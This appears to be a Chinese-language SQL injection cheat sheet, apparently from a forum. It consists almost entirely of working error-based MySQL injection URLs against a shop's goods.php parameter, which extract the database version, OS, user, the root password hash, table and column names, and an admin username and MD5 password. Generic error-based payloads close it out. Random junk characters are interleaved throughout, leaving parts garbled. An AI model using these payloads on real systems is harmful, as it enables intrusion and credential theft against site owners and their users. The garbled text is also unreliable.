
盲注详细内容

判断版本号
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 s/ L) j2 E/ ^8 U
' |7 n1 R, f) @1 C9 u
判断系统

1 }# w: `1 k3 M! N0 q/ g8 e: Chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" {- H; [. N: y- ~
' C/ A" w) t- y: T  M, Y! x
( o1 X2 `+ O7 o8 r9 J* y
6 p, g( d' X: S; A% U5 D
当前 user()
; k& G9 w" _2 d9 d
% @6 D* p2 \1 S1 r9 G2 N- whttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ ^# Q" M8 B3 z7 j& R
2 Z9 \( U8 ?' ~3 o
2 ~! ]4 C8 d. a
' T( @1 m6 b. D
当前 database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 C1 h; F; L3 L
: `( d( t. ?1 G+ u/ p

  p! ~$ X- H, q* C& R( |
, F& p! n& O. C3 F$ T0 c' K* b
root hash

# ?6 G# F& F! d0 |; @http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ ?! h9 B7 c; F7 c* Q& @
' [+ E& C( W8 E, |
% H0 b! ~! l5 x% f- u! {; b' I1 M+ N; g1 j+ i
当前 数据库表名

- B( e8 h/ [: K$ z  l5 |% mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 F, q" l6 E& O6 F( r: U. m* t& n
' P5 E6 C2 {- C: S. i5 ^) H
, t6 ~/ j& n' R0 s( d4 c2 `: v9 s5 r# g
当前 数据库 user_name 字段

, e2 m# _' w. Z' X' n  F+ V5 e( j! |- Xhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%233 N# p* n: |2 N- Q+ Q+ Q

当前 数据库 字段 password
# l/ ?2 A/ \# V! uhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
# Y8 o* a6 z" u7 ?1 a6 k/ ?; A
, ^3 _" W; x, T4 i; M3 P- L
! S7 o9 `. U7 F2 n3 t) B
获得 admin passwd(md5)
3 U" a& {/ q; f, @) M* a2 p' Q

# Z' I$ g% k3 N. v) Khttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' `0 c1 P0 L/ z# G- b3 _' d: @6 e5 B; H* I
报错注射
, z8 }& Q5 q) `' R" F( w7 c9 LSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)2 H! }0 N5 \: @7 U$ ^6 c$ C
6 N0 ?; N, H4 n
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)9 L+ c8 x7 h, p& c2 I

; v5 X& v8 c% e% H6 j: u8 u! M+ Z- Hand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)